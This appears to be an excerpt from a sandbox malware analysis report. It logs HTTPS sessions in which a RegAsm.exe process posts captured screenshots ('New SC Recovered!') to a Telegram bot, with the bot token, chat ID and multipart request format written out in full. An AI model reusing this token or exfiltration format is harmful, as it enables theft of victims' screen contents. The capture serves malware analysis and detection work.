                                                2024-05-24 05:44:15 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb1ecef588748--
                                                2024-05-24 05:44:15 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:15 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:15 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.749719149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:24 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb6c88add5f77
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:24 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:24 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 37 2f 32 30 32 34 20 30 39 3a 35 36 3a 30 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb6c88add5f77Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcb6c88add5f77Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/07/2024 09:56:01User
                                                2024-05-24 05:44:24 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:24 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:24 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:24 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:24 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:44:24 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb6c88add5f77--
                                                2024-05-24 05:44:24 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.749720149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:51 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc4c57a67a1f1
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:51 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:51 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 35 2f 32 30 32 34 20 30 35 3a 30 39 3a 31 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc4c57a67a1f1Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcc4c57a67a1f1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/25/2024 05:09:19User
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:51 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:51 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:44:51 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc4c57a67a1f1--
                                                2024-05-24 05:44:51 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:51 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.749721149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:54 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc78492d93770
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:54 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:54 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 38 2f 32 30 32 34 20 31 37 3a 30 32 3a 31 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc78492d93770Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcc78492d93770Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/28/2024 17:02:11User
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:54 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
